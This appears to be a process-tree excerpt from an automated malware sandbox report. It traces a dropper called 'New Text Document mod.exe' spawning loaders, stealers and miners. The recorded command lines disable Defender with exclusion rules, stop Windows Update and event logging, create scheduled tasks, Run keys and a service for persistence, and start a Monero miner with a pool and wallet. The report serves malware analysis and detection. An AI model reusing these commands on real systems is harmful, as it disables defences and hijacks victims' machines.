C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --no-appcompat-clear --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --field-trial-handle=3188,i,16450066801561252560,3324363905703384995,262144 --variations-seed-version=20250112-180253.846000 --mojo-platform-channel-handle=3204 /prefetch:13⤵PID:4960
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --no-appcompat-clear --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=7 --field-trial-handle=4588,i,16450066801561252560,3324363905703384995,262144 --variations-seed-version=20250112-180253.846000 --mojo-platform-channel-handle=3704 /prefetch:13⤵PID:1204
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.ProcessorMetrics --lang=en-US --service-sandbox-type=none --no-appcompat-clear --field-trial-handle=4836,i,16450066801561252560,3324363905703384995,262144 --variations-seed-version=20250112-180253.846000 --mojo-platform-channel-handle=4844 /prefetch:83⤵PID:3628
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --no-appcompat-clear --field-trial-handle=5072,i,16450066801561252560,3324363905703384995,262144 --variations-seed-version=20250112-180253.846000 --mojo-platform-channel-handle=5020 /prefetch:83⤵PID:4608
-
-
C:\Program Files\Google\Chrome\Application\123.0.6312.123\Installer\setup.exe"C:\Program Files\Google\Chrome\Application\123.0.6312.123\Installer\setup.exe" --reenable-autoupdates --system-level3⤵
- Drops file in Windows directory
PID:1248 -
C:\Program Files\Google\Chrome\Application\123.0.6312.123\Installer\setup.exe"C:\Program Files\Google\Chrome\Application\123.0.6312.123\Installer\setup.exe" --type=crashpad-handler /prefetch:4 --monitor-self-annotation=ptype=crashpad-handler --database=C:\Windows\SystemTemp\Crashpad --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=123.0.6312.123 --initial-client-data=0x298,0x29c,0x2a0,0x274,0x2a4,0x7ff7bbf04698,0x7ff7bbf046a4,0x7ff7bbf046b04⤵
- Drops file in Windows directory
PID:3936
-
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --no-appcompat-clear --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=10 --field-trial-handle=4704,i,16450066801561252560,3324363905703384995,262144 --variations-seed-version=20250112-180253.846000 --mojo-platform-channel-handle=5032 /prefetch:13⤵PID:3352
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --no-appcompat-clear --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=11 --field-trial-handle=4524,i,16450066801561252560,3324363905703384995,262144 --variations-seed-version=20250112-180253.846000 --mojo-platform-channel-handle=3356 /prefetch:13⤵PID:2828
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --no-appcompat-clear --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=12 --field-trial-handle=4700,i,16450066801561252560,3324363905703384995,262144 --variations-seed-version=20250112-180253.846000 --mojo-platform-channel-handle=3272 /prefetch:13⤵PID:4616
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --no-appcompat-clear --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=13 --field-trial-handle=4860,i,16450066801561252560,3324363905703384995,262144 --variations-seed-version=20250112-180253.846000 --mojo-platform-channel-handle=5100 /prefetch:13⤵PID:552
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=audio.mojom.AudioService --lang=en-US --service-sandbox-type=audio --no-appcompat-clear --field-trial-handle=5048,i,16450066801561252560,3324363905703384995,262144 --variations-seed-version=20250112-180253.846000 --mojo-platform-channel-handle=5304 /prefetch:83⤵PID:4608
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=video_capture.mojom.VideoCaptureService --lang=en-US --service-sandbox-type=none --no-appcompat-clear --field-trial-handle=5460,i,16450066801561252560,3324363905703384995,262144 --variations-seed-version=20250112-180253.846000 --mojo-platform-channel-handle=5448 /prefetch:83⤵PID:3428
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --lang=en-US --service-sandbox-type=none --no-appcompat-clear --field-trial-handle=5596,i,16450066801561252560,3324363905703384995,262144 --variations-seed-version=20250112-180253.846000 --mojo-platform-channel-handle=5620 /prefetch:83⤵
- Modifies registry class
- Suspicious behavior: GetForegroundWindowSpam
- Suspicious use of SetWindowsHookEx
PID:3416 -
C:\Users\Admin\Desktop\New Text Document mod.exe"C:\Users\Admin\Desktop\New Text Document mod.exe"4⤵
- Checks computer location settings
- Executes dropped EXE
- Adds Run key to start application
PID:5028 -
C:\Users\Admin\Desktop\._cache_New Text Document mod.exe"C:\Users\Admin\Desktop\._cache_New Text Document mod.exe"5⤵
- Checks computer location settings
- Executes dropped EXE
PID:4480 -
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV16⤵PID:4476
-
-
C:\Users\Admin\Desktop\a\voidware_loader.exe"C:\Users\Admin\Desktop\a\voidware_loader.exe"6⤵
- Executes dropped EXE
PID:4992 -
C:\Windows\SYSTEM32\schtasks.exe"schtasks" /create /tn "DirectX" /sc ONLOGON /tr "C:\Users\Admin\AppData\Roaming\SubDir\DirectX111.exe" /rl HIGHEST /f7⤵
- Scheduled Task/Job: Scheduled Task
PID:1604
-
-
C:\Users\Admin\AppData\Roaming\SubDir\DirectX111.exe"C:\Users\Admin\AppData\Roaming\SubDir\DirectX111.exe"7⤵
- Executes dropped EXE
PID:1124 -
C:\Windows\SYSTEM32\schtasks.exe"schtasks" /create /tn "DirectX" /sc ONLOGON /tr "C:\Users\Admin\AppData\Roaming\SubDir\DirectX111.exe" /rl HIGHEST /f8⤵
- Scheduled Task/Job: Scheduled Task
PID:3732
-
-
-
-
C:\Users\Admin\Desktop\a\build.exe"C:\Users\Admin\Desktop\a\build.exe"6⤵
- Executes dropped EXE
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
PID:476
-
-
-
C:\ProgramData\Synaptics\Synaptics.exe"C:\ProgramData\Synaptics\Synaptics.exe" InjUpdate5⤵
- Executes dropped EXE
- Loads dropped DLL
PID:32
-
-
-
C:\Users\Admin\Desktop\New Text Document mod.exe"C:\Users\Admin\Desktop\New Text Document mod.exe"4⤵
- Checks computer location settings
- Executes dropped EXE
- Loads dropped DLL
- System Location Discovery: System Language Discovery
- Modifies registry class
PID:3032 -
C:\Users\Admin\Desktop\._cache_New Text Document mod.exe"C:\Users\Admin\Desktop\._cache_New Text Document mod.exe"5⤵
- Checks computer location settings
- Executes dropped EXE
PID:1236 -
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV16⤵PID:660
-
-
C:\Users\Admin\Desktop\a\gem2.exe"C:\Users\Admin\Desktop\a\gem2.exe"6⤵
- Executes dropped EXE
- Drops file in System32 directory
- Suspicious use of SetThreadContext
- Suspicious behavior: EnumeratesProcesses
PID:4944 -
C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exeC:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramData) -ExclusionExtension '.exe' -Force7⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
PID:452
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c wusa /uninstall /kb:890830 /quiet /norestart7⤵PID:4728
-
C:\Windows\system32\wusa.exewusa /uninstall /kb:890830 /quiet /norestart8⤵PID:2636
-
-
-
C:\Windows\system32\sc.exeC:\Windows\system32\sc.exe stop UsoSvc7⤵
- Launches sc.exe
PID:2968
-
-
C:\Windows\system32\sc.exeC:\Windows\system32\sc.exe stop WaaSMedicSvc7⤵
- Launches sc.exe
PID:3420
-
-
C:\Windows\system32\sc.exeC:\Windows\system32\sc.exe stop wuauserv7⤵
- Launches sc.exe
PID:1116
-
-
C:\Windows\system32\sc.exeC:\Windows\system32\sc.exe stop bits7⤵
- Launches sc.exe
PID:3976
-
-
C:\Windows\system32\sc.exeC:\Windows\system32\sc.exe stop dosvc7⤵
- Launches sc.exe
PID:1664
-
-
C:\Windows\system32\powercfg.exeC:\Windows\system32\powercfg.exe /x -hibernate-timeout-ac 07⤵
- Power Settings
PID:4132 -
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV18⤵PID:3608
-
-
-
C:\Windows\system32\powercfg.exeC:\Windows\system32\powercfg.exe /x -hibernate-timeout-dc 07⤵
- Power Settings
PID:3440 -
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV18⤵PID:3724
-
-
-
C:\Windows\system32\powercfg.exeC:\Windows\system32\powercfg.exe /x -standby-timeout-ac 07⤵
- Power Settings
PID:4916 -
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV18⤵PID:4044
-
-
-
C:\Windows\system32\powercfg.exeC:\Windows\system32\powercfg.exe /x -standby-timeout-dc 07⤵
- Power Settings
PID:4376 -
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV18⤵PID:3028
-
-
-
C:\Windows\system32\dialer.exeC:\Windows\system32\dialer.exe7⤵
- Suspicious behavior: EnumeratesProcesses
PID:4884
-
-
C:\Windows\system32\sc.exeC:\Windows\system32\sc.exe delete "GeekBrains"7⤵
- Launches sc.exe
PID:912 -
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV18⤵PID:4608
-
-
-
C:\Windows\system32\sc.exeC:\Windows\system32\sc.exe create "GeekBrains" binpath= "C:\ProgramData\Screenshots\Lightshot.exe" start= "auto"7⤵
- Launches sc.exe
PID:1088
-
-
C:\Windows\system32\sc.exeC:\Windows\system32\sc.exe stop eventlog7⤵
- Launches sc.exe
PID:3084 -
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV18⤵PID:1760
-
-
-
C:\Windows\system32\sc.exeC:\Windows\system32\sc.exe start "GeekBrains"7⤵
- Launches sc.exe
PID:4196 -
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV18⤵PID:4776
-
-
-
-
C:\Users\Admin\Desktop\a\gem1.exe"C:\Users\Admin\Desktop\a\gem1.exe"6⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
- System Location Discovery: System Language Discovery
PID:4752 -
C:\Users\Admin\Desktop\a\gem1.exe"C:\Users\Admin\Desktop\a\gem1.exe"7⤵
- Executes dropped EXE
PID:2108
-
-
C:\Users\Admin\Desktop\a\gem1.exe"C:\Users\Admin\Desktop\a\gem1.exe"7⤵
- Executes dropped EXE
PID:2100
-
-
C:\Users\Admin\Desktop\a\gem1.exe"C:\Users\Admin\Desktop\a\gem1.exe"7⤵
- Executes dropped EXE
PID:3004
-
-
C:\Users\Admin\Desktop\a\gem1.exe"C:\Users\Admin\Desktop\a\gem1.exe"7⤵
- Checks computer location settings
- Executes dropped EXE
- Accesses Microsoft Outlook profiles
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
PID:1952
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 4752 -s 8327⤵
- Program crash
PID:1716
-
-
-
C:\Users\Admin\Desktop\a\gem2.exe"C:\Users\Admin\Desktop\a\gem2.exe"6⤵
- Executes dropped EXE
- Drops file in System32 directory
- Suspicious use of SetThreadContext
PID:5904 -
C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exeC:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramData) -ExclusionExtension '.exe' -Force7⤵
- Command and Scripting Interpreter: PowerShell
PID:4316 -
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV18⤵PID:3456
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c wusa /uninstall /kb:890830 /quiet /norestart7⤵PID:5948
-
C:\Windows\system32\wusa.exewusa /uninstall /kb:890830 /quiet /norestart8⤵PID:1284
-
-
-
C:\Windows\system32\sc.exeC:\Windows\system32\sc.exe stop UsoSvc7⤵
- Launches sc.exe
PID:5640
-
-
C:\Windows\system32\sc.exeC:\Windows\system32\sc.exe stop WaaSMedicSvc7⤵
- Launches sc.exe
PID:3704
-
-
C:\Windows\system32\sc.exeC:\Windows\system32\sc.exe stop wuauserv7⤵
- Launches sc.exe
PID:4932 -
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV18⤵PID:5224
-
-
-
C:\Windows\system32\sc.exeC:\Windows\system32\sc.exe stop bits7⤵
- Launches sc.exe
PID:2852
-
-
C:\Windows\system32\sc.exeC:\Windows\system32\sc.exe stop dosvc7⤵
- Launches sc.exe
PID:4372
-
-
C:\Windows\system32\powercfg.exeC:\Windows\system32\powercfg.exe /x -hibernate-timeout-ac 07⤵
- Power Settings
PID:476 -
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV18⤵PID:5664
-
-
-
C:\Windows\system32\powercfg.exeC:\Windows\system32\powercfg.exe /x -hibernate-timeout-dc 07⤵
- Power Settings
PID:3732
-
-
C:\Windows\system32\powercfg.exeC:\Windows\system32\powercfg.exe /x -standby-timeout-ac 07⤵
- Power Settings
PID:5468
-
-
C:\Windows\system32\powercfg.exeC:\Windows\system32\powercfg.exe /x -standby-timeout-dc 07⤵
- Power Settings
PID:5452 -
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV18⤵PID:5836
-
-
-
C:\Windows\system32\dialer.exeC:\Windows\system32\dialer.exe7⤵PID:4696
-
-
C:\Windows\system32\sc.exeC:\Windows\system32\sc.exe stop eventlog7⤵
- Launches sc.exe
PID:5316 -
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV18⤵PID:2108
-
-
-
C:\Windows\system32\sc.exeC:\Windows\system32\sc.exe start "GeekBrains"7⤵
- Launches sc.exe
PID:2024 -
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV18⤵PID:4920
-
-
-
-
C:\Users\Admin\Desktop\a\cbot.exe"C:\Users\Admin\Desktop\a\cbot.exe"6⤵
- Drops startup file
- Executes dropped EXE
PID:5080
-
-
C:\Users\Admin\Desktop\a\AsyncClientGK.exe"C:\Users\Admin\Desktop\a\AsyncClientGK.exe"6⤵
- Executes dropped EXE
- System Location Discovery: System Language Discovery
PID:5728
-
-
C:\Users\Admin\Desktop\a\RuntimeBroker.exe"C:\Users\Admin\Desktop\a\RuntimeBroker.exe"6⤵
- Executes dropped EXE
- Drops file in System32 directory
PID:3196 -
C:\Windows\SYSTEM32\schtasks.exe"schtasks" /create /tn "RuntimeBroker" /sc ONLOGON /tr "C:\Windows\system32\a7\RuntimeBroker.exe" /rl HIGHEST /f7⤵
- Scheduled Task/Job: Scheduled Task
PID:1340
-
-
C:\Windows\system32\a7\RuntimeBroker.exe"C:\Windows\system32\a7\RuntimeBroker.exe"7⤵
- Executes dropped EXE
PID:2392 -
C:\Windows\system32\WerFault.exeC:\Windows\system32\WerFault.exe -u -p 2392 -s 7728⤵
- Checks processor information in registry
- Enumerates system info in registry
PID:6076
-
-
-
-
C:\Users\Admin\Desktop\a\JJSPLOIT.V2.exe"C:\Users\Admin\Desktop\a\JJSPLOIT.V2.exe"6⤵
- Executes dropped EXE
PID:900 -
C:\Windows\SYSTEM32\schtasks.exe"schtasks" /create /tn "windows background updater" /sc ONLOGON /tr "C:\Users\Admin\AppData\Roaming\windows updater\windows 3543.exe" /rl HIGHEST /f7⤵
- Scheduled Task/Job: Scheduled Task
PID:5724 -
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV18⤵PID:4632
-
-
-
C:\Users\Admin\AppData\Roaming\windows updater\windows 3543.exe"C:\Users\Admin\AppData\Roaming\windows updater\windows 3543.exe"7⤵
- Checks computer location settings
- Executes dropped EXE
- Suspicious use of SetWindowsHookEx
PID:2500 -
C:\Windows\SYSTEM32\schtasks.exe"schtasks" /create /tn "windows background updater" /sc ONLOGON /tr "C:\Users\Admin\AppData\Roaming\windows updater\windows 3543.exe" /rl HIGHEST /f8⤵
- Scheduled Task/Job: Scheduled Task
PID:1920 -
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV19⤵PID:5548
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\j1MGdyF5ndD6.bat" "8⤵PID:3264
-
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV19⤵PID:1936
-
-
C:\Windows\system32\chcp.comchcp 650019⤵PID:4376
-
-
C:\Windows\system32\PING.EXEping -n 10 localhost9⤵
- System Network Configuration Discovery: Internet Connection Discovery
- Runs ping.exe
PID:4028
-
-
C:\Users\Admin\AppData\Roaming\windows updater\windows 3543.exe"C:\Users\Admin\AppData\Roaming\windows updater\windows 3543.exe"9⤵
- Checks computer location settings
PID:3196 -
C:\Windows\SYSTEM32\schtasks.exe"schtasks" /create /tn "windows background updater" /sc ONLOGON /tr "C:\Users\Admin\AppData\Roaming\windows updater\windows 3543.exe" /rl HIGHEST /f10⤵
- Scheduled Task/Job: Scheduled Task
PID:3560 -
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV111⤵PID:1368
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\5t3fIvbDYbbb.bat" "10⤵PID:4944
-
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV111⤵PID:1120
-
-
C:\Windows\system32\chcp.comchcp 6500111⤵PID:4900
-
-
C:\Windows\system32\PING.EXEping -n 10 localhost11⤵
- System Network Configuration Discovery: Internet Connection Discovery
- Runs ping.exe
PID:1936
-
-
C:\Users\Admin\AppData\Roaming\windows updater\windows 3543.exe"C:\Users\Admin\AppData\Roaming\windows updater\windows 3543.exe"11⤵PID:5856
-
C:\Windows\SYSTEM32\schtasks.exe"schtasks" /create /tn "windows background updater" /sc ONLOGON /tr "C:\Users\Admin\AppData\Roaming\windows updater\windows 3543.exe" /rl HIGHEST /f12⤵
- Scheduled Task/Job: Scheduled Task
PID:4500 -
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV113⤵PID:3068
-
-
-
-
-
-
-
-
-
C:\Users\Admin\Desktop\a\albt.exe"C:\Users\Admin\Desktop\a\albt.exe"6⤵
- Executes dropped EXE
- System Location Discovery: System Language Discovery
PID:568 -
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 568 -s 7687⤵
- Program crash
PID:5776
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 568 -s 8127⤵
- Program crash
PID:5004
-
-
-
C:\Users\Admin\Desktop\a\drop2.exe"C:\Users\Admin\Desktop\a\drop2.exe"6⤵
- Executes dropped EXE
- Adds Run key to start application
- Maps connected drives based on registry
- Drops file in System32 directory
- Suspicious use of SetThreadContext
- Drops file in Program Files directory
- Enumerates system info in registry
PID:3052 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell.exe -Command "Add-MpPreference -ExclusionExtension '.exe'; Add-MpPreference -ExclusionProcess 'svchost.exe'"7⤵
- Command and Scripting Interpreter: PowerShell
PID:5964 -
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV18⤵
- Suspicious use of SetWindowsHookEx
PID:4324
-
-
-
C:\Windows\SYSTEM32\SCHTASKS.exeSCHTASKS /CREATE /TN "System-f4855f59e0" /TR "C:\Windows\System32\System-f4855f59e0.exe" /SC ONLOGON /RL HIGHEST /F7⤵
- Scheduled Task/Job: Scheduled Task
PID:3276
-
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe7⤵
- Suspicious use of SetThreadContext
PID:5348 -
C:\Windows\System32\powercfg.exepowercfg -change standby-timeout-ac 08⤵
- Power Settings
PID:4960 -
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV19⤵PID:1548
-
-
-
C:\Windows\System32\powercfg.exepowercfg -change monitor-timeout-ac 08⤵
- Power Settings
PID:5172 -
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV19⤵PID:5756
-
-
-
C:\Windows\System32\powercfg.exepowercfg /setacvalueindex SCHEME_CURRENT SUB_BUTTONS LIDACTION 08⤵
- Power Settings
PID:5292 -
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV19⤵PID:580
-
-
-
C:\Windows\System32\powercfg.exepowercfg /setactive SCHEME_CURRENT8⤵
- Power Settings
PID:5244 -
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV19⤵PID:5980
-
-
-
C:\Windows\System32\Wbem\wmic.exewmic diskdrive get serialnumber8⤵PID:2000
-
-
C:\Windows\System32\Wbem\wmic.exewmic diskdrive get serialnumber8⤵PID:568
-
-
C:\Windows\System32\curl.execurl -s https://api.ipify.org8⤵PID:5252
-
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV19⤵PID:5688
-
-
-
C:\Windows\System32\Wbem\wmic.exewmic diskdrive get serialnumber8⤵PID:5244
-
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV19⤵PID:4596
-
-
-
C:\Windows\System32\curl.execurl -s http://ipinfo.io/country8⤵PID:388
-
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV19⤵PID:4124
-
-
-
C:\Windows\System32\svchost.exe"C:\Windows\System32\svchost.exe" --algo rx/0 --url pool.supportxmr.com:8080 --user 46M39DM1DQjFKUnT3t2KiHNU6qQjmRF79J31fSbtBNafUX9B2gAwysjLFADQ5mhqR4M6C8JJRFXwLPxDHapuCrHE3mRBjTw/lunarig --cpu-max-threads-hint=308⤵PID:5760
-
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV19⤵PID:2600
-
-
-
-
C:\Windows\SysWOW64\explorer.exe"C:\Windows\SysWOW64\explorer.exe"7⤵PID:4252
-
-
C:\Windows\SysWOW64\explorer.exe"C:\Windows\SysWOW64\explorer.exe"7⤵
- System Location Discovery: System Language Discovery
PID:2676
-
-
-
C:\Users\Admin\Desktop\a\01.exe"C:\Users\Admin\Desktop\a\01.exe"6⤵
- Executes dropped EXE
- System Location Discovery: System Language Discovery
PID:2256 -
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV17⤵
- Suspicious use of SetWindowsHookEx
PID:4100
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 2256 -s 3847⤵
- Program crash
PID:5996
-
-
-
C:\Users\Admin\Desktop\a\wudi.exe"C:\Users\Admin\Desktop\a\wudi.exe"6⤵
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Identifies Wine through registry keys
- Loads dropped DLL
- Suspicious use of NtSetInformationThreadHideFromDebugger
- System Location Discovery: System Language Discovery
- Suspicious use of SetWindowsHookEx
PID:5444
-
-
C:\Users\Admin\Desktop\a\32.exe"C:\Users\Admin\Desktop\a\32.exe"6⤵
- System Location Discovery: System Language Discovery
PID:5756 -
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV17⤵
- Suspicious use of SetWindowsHookEx
PID:1612
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 5756 -s 3847⤵
- Program crash
PID:3348
-
-
-
C:\Users\Admin\Desktop\a\IMG001.exe"C:\Users\Admin\Desktop\a\IMG001.exe"6⤵
- Checks computer location settings
- System Location Discovery: System Language Discovery
PID:4768 -
C:\Windows\SysWOW64\cmd.exe"C:\Windows\system32\cmd.exe" /c taskkill /f /im tftp.exe & tskill tftp.exe7⤵
- System Location Discovery: System Language Discovery
PID:1820 -
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV18⤵PID:1628
-
-
C:\Windows\SysWOW64\taskkill.exetaskkill /f /im tftp.exe8⤵
- System Location Discovery: System Language Discovery
- Kills process with taskkill
PID:4160
-
-
-
C:\Users\Admin\AppData\Local\Temp\tftp.exe"C:\Users\Admin\AppData\Local\Temp\tftp.exe"7⤵
- System Location Discovery: System Language Discovery
PID:4828
-
-
C:\Users\Admin\AppData\Roaming\NsMiner\IMG001.exe"C:\Users\Admin\AppData\Roaming\NsMiner\IMG001.exe"7⤵
- Checks computer location settings
- Drops startup file
- Loads dropped DLL
- Adds Run key to start application
- Enumerates connected drives
- System Location Discovery: System Language Discovery
PID:5040 -
C:\Windows\SysWOW64\cmd.exe"C:\Windows\system32\cmd.exe" /c taskkill /f /im tftp.exe & tskill tftp.exe8⤵
- System Location Discovery: System Language Discovery
PID:4780 -
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV19⤵PID:4336
-
-
C:\Windows\SysWOW64\taskkill.exetaskkill /f /im tftp.exe9⤵
- Kills process with taskkill
PID:5156
-
-
-
C:\Users\Admin\AppData\Local\Temp\tftp.exe"C:\Users\Admin\AppData\Local\Temp\tftp.exe"8⤵
- System Location Discovery: System Language Discovery
PID:648
-
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\system32\cmd.exe" /c reg add "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "" /d "C:\Users\Admin\AppData\Roaming\NsMiner\IMG001.exe" /t REG_SZ8⤵
- System Location Discovery: System Language Discovery
PID:1784 -
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV19⤵PID:3348
-
-
C:\Windows\SysWOW64\reg.exereg add "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "" /d "C:\Users\Admin\AppData\Roaming\NsMiner\IMG001.exe" /t REG_SZ9⤵
- Adds Run key to start application
- System Location Discovery: System Language Discovery
PID:1264
-
-
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\system32\cmd.exe" /c schtasks /create /tn "UAC" /SC ONLOGON /F /RL HIGHEST /TR "C:\Users\Admin\AppData\Roaming\NsMiner\IMG001.exe"8⤵PID:3416
-
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV19⤵PID:748
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /create /tn "UAC" /SC ONLOGON /F /RL HIGHEST /TR "C:\Users\Admin\AppData\Roaming\NsMiner\IMG001.exe"9⤵
- System Location Discovery: System Language Discovery
- Scheduled Task/Job: Scheduled Task
PID:1164
-
-
-
-
-
C:\Users\Admin\Desktop\a\Kerish_Doctor_2023.exe"C:\Users\Admin\Desktop\a\Kerish_Doctor_2023.exe"6⤵
- System Location Discovery: System Language Discovery
PID:5344 -
C:\Users\Admin\AppData\Local\Temp\is-U66QV.tmp\Kerish_Doctor_2023.tmp"C:\Users\Admin\AppData\Local\Temp\is-U66QV.tmp\Kerish_Doctor_2023.tmp" /SL5="$20430,33350357,805376,C:\Users\Admin\Desktop\a\Kerish_Doctor_2023.exe"7⤵
- Loads dropped DLL
- System Location Discovery: System Language Discovery
PID:1576
-
-
-
C:\Users\Admin\Desktop\a\Kerish_Doctor_Windows_8.2.exe"C:\Users\Admin\Desktop\a\Kerish_Doctor_Windows_8.2.exe"6⤵
- System Location Discovery: System Language Discovery
PID:3352
-
-
C:\Users\Admin\Desktop\a\Kerish_Doctor_Windows.exe"C:\Users\Admin\Desktop\a\Kerish_Doctor_Windows.exe"6⤵
- System Location Discovery: System Language Discovery
PID:4124 -
C:\Users\Admin\AppData\Local\Temp\is-T2B3Q.tmp\Kerish_Doctor_Windows.tmp"C:\Users\Admin\AppData\Local\Temp\is-T2B3Q.tmp\Kerish_Doctor_Windows.tmp" /SL5="$303CA,33350357,805376,C:\Users\Admin\Desktop\a\Kerish_Doctor_Windows.exe"7⤵
- Loads dropped DLL
PID:5216
-
-
-
